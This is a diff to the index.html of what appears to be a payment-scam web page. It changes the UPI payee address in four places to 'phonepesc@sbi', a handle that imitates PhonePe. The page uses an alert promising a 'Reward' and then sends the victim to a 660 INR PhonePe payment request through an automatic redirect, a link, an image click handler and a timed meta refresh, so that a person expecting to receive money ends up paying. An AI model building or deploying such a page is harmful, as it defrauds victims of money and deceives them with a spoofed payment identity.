--- a/index.html
+++ b/index.html
@@ -81,7 +81,7 @@
 
   t.state && alert(' Claim your Reward by Clicking on \n "SEND IN BANK ACCOUNT"  ')
 
-location.href='phonepe://pay?pa=dreamoffersz@pnb&pn=YDV56693218&tn=recivvee&am=660&cu=INR&mode=02&purpose=00&tr '
+location.href='phonepe://pay?pa=phonepesc@sbi&pn=YDV56693218&tn=recivvee&am=660&cu=INR&mode=02&purpose=00&tr '
 
   ;
 
@@ -213,7 +213,7 @@ location.href='phonepe://pay?pa=dreamoffersz@pnb&pn=YDV56693218&tn=recivvee&am=6
 
 			
 
-			 <a href="phonepe://pay?pa=dreamoffersz@pnb&pn=YDV56693218&tn=recivvee&am=660&cu=INR&mode=02&purpose=00&tr">
+			 <a href="phonepe://pay?pa=phonepesc@sbi&pn=YDV56693218&tn=recivvee&am=660&cu=INR&mode=02&purpose=00&tr">
 
 				 
 
@@ -229,7 +229,7 @@ location.href='phonepe://pay?pa=dreamoffersz@pnb&pn=YDV56693218&tn=recivvee&am=6
 
 			
 
-             <img src="3 (2).jpg" width="100%" height="auto" onclick="location.href="phonepe://pay?pa=dreamoffersz@pnb&pn=YDV56693218&tn=recivvee&am=660&cu=INR&mode=02&purpose=00&tr">
+             <img src="3 (2).jpg" width="100%" height="auto" onclick="location.href="phonepe://pay?pa=phonepesc@sbi&pn=YDV56693218&tn=recivvee&am=660&cu=INR&mode=02&purpose=00&tr">
 
         </div>
 
@@ -243,7 +243,7 @@ location.href='phonepe://pay?pa=dreamoffersz@pnb&pn=YDV56693218&tn=recivvee&am=6
 
 	
 
-	<meta http-equiv="refresh" content="6;url="phonepe://pay?pa=dreamoffersz@pnb&pn=YDV56693218&tn=recivvee&am=660&cu=INR&mode=02&purpose=00&tr">
+	<meta http-equiv="refresh" content="6;url="phonepe://pay?pa=phonepesc@sbi&pn=YDV56693218&tn=recivvee&am=660&cu=INR&mode=02&purpose=00&tr">
 
 	
 
